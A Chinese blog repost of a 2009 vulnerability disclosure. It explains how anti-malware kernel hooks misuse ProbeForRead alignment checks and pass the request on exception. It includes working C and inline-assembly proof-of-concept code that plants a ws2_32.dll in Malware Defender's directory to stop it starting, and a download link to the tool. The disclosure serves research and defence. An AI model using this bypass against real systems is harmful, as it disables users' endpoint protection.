ProbeBypass攻击技术

最新推荐文章于 2024-09-26 11:09:59 发布
最新推荐文章于 2024-09-26 11:09:59 发布
阅读量1.7k 收藏 4
点赞数
分类专栏: windows底层核心編程 文章标签: string file attributes exception user path
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/iiprogram/article/details/4790325
版权

 作 者: qihoocom
时 间: 2009-10-29,22:37
链 接: http://bbs.pediy.com/showthread.php?t=100321

本文介绍了一种方法,利用很多安全防御软件在进行用户态内存校验时的漏洞,对其保护系统进行攻击,达到绕过保护的目的。

这是安全防御软件对于用户态内存校验未能慎重处理而引发的恶果之一。去年10月我曾在对国内外绝大部分主动防御产品的系列漏洞文章中,揭示了同样由于对用户态内存校验不慎重,导致的一些本地内核模式拒绝访问漏洞的问题,这里我将介绍利用这类漏洞进行的攻击绕过方法,这个漏洞是我去年发现并在内部圈子做过一些讨论的,现在我将它公开出来。

本文会以Malware Defender最新版 2.4.1的实际存在的漏洞为例,来讲解这个攻击方法,但并不代表仅有这个安全软件存在漏洞,市面上大部分带防御驱动的安全产品都存在此漏洞。

很多安全防御软件在进行用户态内存的校验时,会使用 ProbeForRead函数,这个函数的源代码如下:

代码: 
   if (Length != 0) {
        if (((ULONG_PTR)Address & (Alignment - 1)) != 0) {
            ExRaiseDatatypeMisalignment();

        } else if ((((ULONG_PTR)Address + Length) > (ULONG_PTR)MM_USER_PROBE_ADDRESS) ||
                   (((ULONG_PTR)Address + Length) < (ULONG_PTR)Address)) {

            *(volatile UCHAR * const)MM_USER_PROBE_ADDRESS = 0;
        }
    }

我们可以看到它实际做了这么两件事:

1.检查缓存长度不为0后,检查内存是否按指定的字节数对其

2.检查整个缓存区是否位于用户态内存范围内

这两个检查任意一个不成功,该函数都会引发一个异常,通常防御软件的驱动程序会在调用这个API的函数内设置try_except,并由其来捕获异常。通常在安全软件的HOOK过滤函数中,当捕获到这个异常,会直接放行这个操作

那么很容易想到,如果过滤函数中,未能正确设置要对齐的字节数,例如,过滤函数中,对某个缓存设置的对齐字节数为2,那么若缓存地址并未按2对齐,这时过滤驱动就会放行这个函数请求。但是如果Windows内核中,对这个缓存并不需要其按2对其进行检查,那么这个请求就会成功执行了。。

以Malware Defender为例,其核心驱动mdcore.sys(2.4.0.0 Final , CheckSum:4AE56 Timestamp:0x4AE7D795),对NtCreateFile的挂钩中有这样的处理

代码: 
HookedNtCreateFile(....)

{

IncRefCnt(NT_CREATE_FILE_INDEX);

... //省略无关代码

__try

{

ProbeForRead(ObjectAttributes , sizeof(OBJECT_ATTRIBUTES) , 1);

ProbeForRead(ObjectAttributes->ObjectName , sizeof(UNICODE_STRING) , sizeof(WORD));

///省略无关代码

}

__except(EXCEPTION_EXECUTE_HANDLER)

{

bPassRequest = TRUE ;

}

if (bPassRequest)

{

///此处调用原始函数,放行操作

}

可以看到,MD对ObjectAttributes的ObjectName参数进行ProbeForRead时,使用了对齐字节数 2 , 但系统对这个参数的对齐是如何处理的呢?

实际上NtCreateFile对这个参数的处理位于:NtCreateFile->IoCreateFile->IopCreateFile->ObOpenObjectByName->ObpCaptureObjectCreateInformation->ObpCaptureObjectName中

关键代码如下:

代码: 
    try {

        if (ProbeMode != KernelMode) {

            ProbeAndReadUnicodeStringEx(&InputObjectName, ObjectName);

            ProbeForRead( InputObjectName.Buffer,
                          InputObjectName.Length,
                          sizeof(WCHAR) );

.....

ProbeAndReadUnicodeStringEx宏的实现:

代码: 
#define ProbeAndReadUnicodeString(Source) /
    (((Source) >= (UNICODE_STRING * const)MM_USER_PROBE_ADDRESS) ? /
        (*(volatile UNICODE_STRING * const)MM_USER_PROBE_ADDRESS) : (*(volatile UNICODE_STRING *)(Source)))

可以看到,系统对这个参数压根没有进行任何字节对齐检查。

因此,我们可以构造一个特殊的NtCreateFile请求,并将ObjectName存放的缓存设置为不按2对齐的,就可以绕过MD的过滤,进行任何创建文件操作,例如,创建一个ws2_32.dll到md的目录下,导致其无法启动(正常MD保护打开时,是无法创建这个文件的)

示例代码如下:

代码: 
WCHAR Filefname[MAX_PATH] = L"//??//c://program files//malware defender//ws2_32.dll//";


HMODULE hmod = GetModuleHandle("ntdll.dll");
PVOID pNtCreateFile = GetProcAddress(hmod , "NtCreateFile");

if (pNtCreateFile == 0)
{
   printf("cannot get NtCreateFile/n");
   getchar();
   return 0 ; 
}

HANDLE hFile ; 
ULONG FileAccess = DIRECTORY_ALL_ACCESS ;
OBJECT_ATTRIBUTES oba ; 
IO_STATUS_BLOCK iosb ; 
ULONG FileAttr = FILE_ATTRIBUTE_NORMAL ; 
ULONG FileShare = FILE_SHARE_READ | FILE_SHARE_WRITE ;
ULONG CreateDispos = FILE_CREATE ; 
ULONG CreateOptions = FILE_DIRECTORY_FILE;
LONG stat ;
UNICODE_STRING uniname ; 
uniname.Length = wcslen(Filefname) * sizeof(WCHAR);
uniname.MaximumLength = MAX_PATH * sizeof(WCHAR);
uniname.Buffer = Filefname ; 
PVOID pUniName = malloc(0x1000);
while (((ULONG)pUniName & 1) == 0 )
{
   pUniName = (PVOID)((ULONG)pUniName + 1) ; 
}

CopyMemory(pUniName , &uniname , sizeof(UNICODE_STRING));


InitializeObjectAttributes(&oba , (PUNICODE_STRING)pUniName , OBJ_CASE_INSENSITIVE , 0 , 0 );
__asm
{

   push 0
   push 0
   push CreateOptions
   push CreateDispos
   push FileShare
   push FileAttr
   push 0
   lea eax , iosb
   push eax
   lea eax ,oba
   push eax
   push FileAccess
   lea eax ,hFile
   push eax
   call pNtCreateFile
   mov stat , eax
}

if (stat != 0 )
{
   printf("cannot open file %ws %08x/n" , Filefname , stat);
   getchar();
   return 0; 
}

printf("create File OK!/n");

getchar();
return 0;

攻击结果:
 
名称: tt1.JPG 查看次数: 648 文件大小: 68.7 KB

测试程序下载:

附件 killmdfile.rar
或到http://mj0011.ys168.com 漏洞演示目录下killmdfile.rar下载

合格黑客都掌握的waf与Bypass攻击渗透实战技术
代码讲故事
02-05 245
合格黑客都掌握的waf与Bypass攻击渗透实战技术。 WAF(Web Application Firewall)是一种保护Web应用程序免受各种攻击的安全解决方案。它通过监控、过滤和阻止恶意流量来保护Web应用程序。然而,黑客有时会尝试绕过WAF的防护措施,以便对网站进行攻击
【深度学习】【机器学习】用神经网络进行入侵检测,NSL-KDD数据集,基于机器学习(深度学习)判断网络入侵,网络攻击,流量异常
q742971636的博客
03-30 4332
特征编号特征名称特征描述类型范围1duration连接持续时间,从TCP连接建立到结束的时间,或每个UDP数据包的连接时间连续[0, 58329]秒2协议类型,可能值为TCP, UDP, ICMP离散3service目标主机的网络服务类型,共70种可能值离散4flag连接状态,11种可能值,表示连接是否按照协议要求开始或完成离散5src_bytes从源主机到目标主机的数据的字节数连续6dst_bytes从目标主机到源主机的数据的字节数连续7。
渗透测试基础 - bypass-绕过阻挡我们的WAF(下)
weixin_45488495的博客
06-06 1131
渗透测试基础 - bypass-绕过阻挡我们的WAF(下)简介 只为对所学知识做一个简单的梳理,如果有表达存在问题的地方,麻烦帮忙指认出来。我们一起为了遇见更好的自己而努力????! 【请进行合法的渗透测试,有关内容只是用作个人复习。】 简介 上次介绍了如何绕过安全狗的测试语句检测,这次将介绍,在得到webshell权限后,如何让自己的木马文件不会被发现并删除。已webshell查杀来说,安全狗确实差了点意思,稍微对语句做一点变动,安全狗就不能正常的识别,所以这里会在多加入两个webshell检测工具,进行
【网络安全】DVWA之Content Security Policy (CSP) Bypass 攻击姿势及解题详析合集
等风来
06-16 5238
CSP 可以阻止恶意代码、恶意插件或其他不受信任的资源被加载到页面上,从而增加页面的安全性。通过合理配置 CSP,网站管理员可以严格限制哪些资源能被加载,从而减少恶意代码执行的风险。指令设置 nonce ,其目的是为了提供额外的安全性,确保只有具有相应 nonce 的脚本能够被执行。接下来的代码段是一个表单,允许用户输入内容,并将该内容直接输出到页面中。这行代码,禁用了浏览器的跨站脚本攻击(XSS)防护机制,以便内联的弹窗警告框能够正常工作。的函数,用于处理异步加载的远程脚本返回的数据。
XSS攻击BYPASS及防御
qq_45944626的博客
08-24 1023
XSS攻击BYPASS及防御攻击一、 反射型XSS二、 存储型XSS三、 DOM型XSSbypass漏洞修复 攻击 一、 反射型XSS 前端 -> 后端 -> 前端 在URL中+ 一般存在在id=xxx 将xxx替换为,观察页面是否弹出”1” 若成功弹出,则存在反射型xss注入漏洞 二、 存储型XSS 前端 -> 后端 -> 数据库 -> 前端 输入框中的内容会存储在数据库中,然后回显在网页上 一般存在在留言框和页面搜索框中 2. <script>aler
Bypass部分知识
小小猪的博客
11-27 861
Bypass部分知识 Upload: 容器特性: Apache1.X/2.X 从后向前识别,直到可识别的扩展名 x.php.asd IIS6 目录为*.asp/*.asa等可被IIS动态执行的扩展名 /2.asp/1.jpg IIS7&7.5 / <=Nginx0.8.3 上传1.jpg 访问1.jpg/.php Ngi...
Probe Request
qq_43776408的博客
10-25 4822
如果某AP的SSID是隐藏的 那么通常手机发送的普通的probe request包是无法获取到隐藏的SSID //////////////////////////////////// 无线客户端工作过程中,会定期地搜索周围的无线网络,也就是主动扫描周围的无线网络 根据Probe Request帧(探测请求帧)是否携带SSID,可以将主动扫描分为两种: 客户端发送Probe Request帧...
Mastik:微体系结构侧信道攻击工具包
分享观点和经验,欢迎交流。
08-17 919
1. 引言 微体系结构侧通道攻击利用了处理器内部组件的竞争,从而泄漏了进程之间的信息。虽然从理论上讲这类攻击很简单,但实际的实现方式往往很复杂,并且需要对文献记载不充分的处理器函数和其他领域专有的知识有充分的了解。因此,进入微体系结构侧通道攻击的工作存在障碍,这阻碍了该领域的发展以及现有软件抵御此类攻击的能力的分析。 本文介绍 Mastik,一个用于测试微体系结构侧通道攻击的工具包。Mastik旨在提供已发布的攻击和分析技术的实现。在撰写本文时,Mastik尚处于 开发的早期阶段。0.02版的代号 “Aye
SSRF漏洞之常见Bypass
weixin_39664643的博客
02-22 2387
SSRF–(Server-side Request Forge, 服务端请求伪造) 定义:由攻击者构造的攻击链接传给服务端执行造成的漏洞,一般用来在外网探测或攻击内网服务 SSRF漏洞思维导图如下,本篇主要介绍利用SSRF Bypass利用原理与方式 SSRF漏洞形成的原因主要是服务器端所提供的接口中包含了所要请求的内容的URL参数,并且未对客户端所传输过来的URL参数进行过滤 一般的防御措施是对URL参数进行过滤,或者使得URL参数用户不可控,但当过滤方法不当时,就存在Bypass的不同方式 通过CTF
第二章——常见的几种攻击方法
最新发布
qq_52843384的博客
09-26 1181
Prime+Abort攻击通过利用Intel TSX的事务内存特性,不需要依赖高精度定时器,仅通过事务是否提交或中止的信息来推测缓存的状态变化。这种方法能够提供高精度的缓存状态分析,是一种有效的缓存侧信道攻击手法。
两种类型的probe request
Arm_leg的专栏
07-21 1万+
现象如果某AP的SSID是隐藏的,那么通常手机发送的普通的probe request包是无法获取到隐藏的SSID,必须在probe request包中指定SSID才可以扫描到隐藏的SSID。   根据SSID的长度划分,probe request帧应该可以分为两类 1)  SSID长度为0,probe不包含具体的SSID信息,如果某个AP隐藏了SSID,就不回应这种probe request
Tomcat监控工具Probe,支持tomcat6-7-8-9.zip
12-12
Tomcat监控工具Probe 1.Porbe介绍 psi-probe用于对Tomcat进行监控,比tomcat的manager强大很多。 2.下载 probe-2.3.3.zip 或者 probe.war 3.将下载好的war包,或者zip文件,放在tomcat的webapp目录下 4.配置tomcat-users.xml文件 标签内添加,具体的权限配置,查看下面表格 注:tomcat-users.xm包含了所有Tomcat服务器的注册用户,其中有role(角色)、user(用户)两种信息 (1)role Tomcat中保存了一些用户权限,也就是角色,比如admin、Tomcat等。用户还可以自定义,通过""来注册一个角色。它只有rolename一个属性,通过这个属性可以把用户的权限进行分配。 (2)User 这个数据项中包含了诸如用户名、用户密码、用户权限、用户说明等数据属性。 probe有 probeuser、poweruser、poweruserplus、manager(针对不同tomcat版本)等角色,对应可操作的功能如下表: 特别注意一点:表格里面的X表示拥有权限,也就是说,manager的权限是最大的,什么都能操作(不推荐配置)。 Features by Role probeuser poweruser poweruserplus manager Context: list X X X X Context: status X X X X Context: view servlets X X X X Context: view servlet mappings X X X X Context: view filters X X X X Context: view filter mappings X X X X Context: list attributes X X X X Context: remove attributes X X X Context: start X X X Context: stop X X X Context: view web.xml X X X Context: view context.xml X Context: deploy X Context: undeploy X Session: list X X X X Session: list attributes X X X X Session: search attributes X X X X Session: remove attributes X X X Session: view last-accessed IP X X X X Session: expire single X X X Session: expire multiple X X X JSP: list X X X JSP: view source X X X JSP: view servlet source X X X JSP: compile single X X X JSP: compile multiple X X X JSP: compile all on deployment X JSP: discard all compiled X Data Source: list X X X X Data Source: group by JDBC URL X X X X Data Source: status X X X X Data Source: reset X X X Data Source: test X X Data Source: view query history X X Data Source: execute SQL X X Log: list X X X X Log: tail in real-time X X X X Log: download X X X X Thread: list X X X X Thread: view execution stack X X X Thread: kill X Connector: status X X X X Connector: real-time usage charts X X X X Cluster: status X X X X Cluster: real-time traffic charts X X X X JVM: real-time memory usage charts X X X X JVM: status X X X X JVM: advise GC X Java Service Wrapper: status X X X X Java Service Wrapper: restart JVM X System: overview X X X X System: properties X X X X System: OS details X Quick Check: execute X 5.启动tomcat,访问http://localhost:8080/probe/ 6.probe使用介绍 Applecations:tomcat上面正在跑的应用,可以看到每个应用的状态、请求数、session数等,点进去可以查看详细信息 Data Sources:tomcat的数据源,我这里没有配置数据源 Deployment:代码部署,选择一个war并部署。我这边没用这个东西来部署过代码,用脚本来实现 Logs:tomcat日志 Threads:tomcat线程,可以查看线程的状态等信息,还可以杀死线程 Cluster:tomcat集群 System Information:系统信息 Connectors:connector信息,可以看到每秒的请求数、响应时间等 Quick check:快速检测tomcat的数据源、内存等
lambdaprobe 1.7b 2.3.3 2.4.0
09-17
压缩包内容包括: LambdaProbe中文语言包messages_zh_CN.zip 汉化包messages_zh_CN.zip probe.1.7b.zip probe-2.3.3.zip probe-2.4.0.zip(最新版本) 使用说明.docx 从1.7b到最新的2.4.0三个版本,解压后是war包,包括中文语言文件,随你喜欢,随便用。 LambdaProbe 是一款强大的免费开源工具,LambdaProbe拥有几乎所有Tomcat Manager的功能, 可以说是一个增强版本的 Tomcat Manager。除此之外,Tomcat Probe 还拥有很多让开发者和系统管理者更方便的性能。从而使得Tomcat对开发者和管理者更加透明。
Probe Request 帧结构详细分解
wit_732的博客
12-29 7937
Probe Request帧结构 概述 probe request属于管理帧,其遵循管理帧的一般格式,在《802.11无线权威指南》中管理帧的一般格式为: 因为probe request属于管理帧,所以其也遵循这个格式。简单说明下各个部分的含义。 帧主体中大部份的数据,如果使用长度固定的位,就称为固定式位; 如果位长度不定,就称为信息元素( information element)。所谓信息元素,是指长度不定的数据区块。 每个数据区块均会标注上类型编号与大小, 各种信息元素的数据位都有特定的解释方式。 M
CPU缓存侧信道攻击
网络空间发展与战略研究
04-29 1万+
2018年年初,多个独立的安全研究团队披露了现代CPU架构的若干严重漏洞,在业界造成了极大地影响,至今仍余波未了。在这些漏洞的利用方式中,针对CPU缓存的侧信道攻击技术是主要方式。什么是针对CPU缓存的侧信道攻击?黑客会如何利用侧信道攻击技术? 密码是一种用来混淆的技术,它将正常的(可识别的)信息转变为无法识别的信息。现阶段用户的隐私信息大多是依靠加密技术实现,如登录网站、电子邮箱、银行取款等等...
抓取wifi sniffer日志看WiFi的连接过程
franc521的博客
04-13 2689
STA 主动发送Probe Request包,表明想加入的网络,自身的支持的速率能力,以及厂商信息等, 可以看出这里是广播的形式,所以目的地址都是ff:ff:ff:ff:ff:ff,SSID长度为0时,SSID设置为 Wildcard SSID。STA收到认证successful报文后,决定加入网络,则会发送Association Request帧,指明要加入的网络,以及自己的监听时间间隔(即STA多久监听一次Beacon帧)以及自己的能力信息。
刚入门小黑客记一次对某站点的渗透测试(bypass)
kjuhfkicf154的博客
01-31 1738
渗透已授权。非授权渗透是违法行为!
probe request帧结构_第六章 深入理解wi-Fi Simple Configuration
weixin_28973649的博客
12-29 944
第6章深入理解Wi-Fi Simple Configuration本章主要内容:介绍Wi-Fi SimpleConfiguration相关知识;介绍Android中WSC的相关代码。6.1概述在Wi-Fi相关技术体系中,除了802.11定义的标准规范外,Wi-FiAlliance(Wi-Fi联盟)也推出了两项比较重要的技术规范,他们分别是Wi-Fi SimpleConfiguration和Wi...
tomcat服务器监控工具之probe
热门推荐
我心如水
07-31 1万+
前言:今天把公司的一台tomcat服务器进行了迁移,为了查看在使用过程中的详细信息,在网上搜索了很多关于web服务器的监控软件,最后拟定使用probe这个开源并且功能也很完善的一款工具接下来介绍一下使用方法与安装技巧 一、简介 psi-probe是lambdaprobe的一个分支版本,用于对Tomcat进行监控,比tomcat的manager强大很多。 psi就是一个形如叉子的符
platform的probe函数是何时被调用的
井朝天的专栏
10-14 5377
这几天搞TI的vpfe,里面设备的注册使用platform,平台设备注册方式来注册的。一直都知道 112 struct device_driver { 113 const char * name; 114 struct bus_type * bus; 115 116 struct completion unloaded; 117 struc
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值